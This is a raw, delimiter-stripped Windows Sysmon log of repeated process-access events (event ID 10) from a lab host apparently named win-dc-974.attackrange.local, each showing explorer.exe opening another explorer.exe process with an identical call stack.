16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 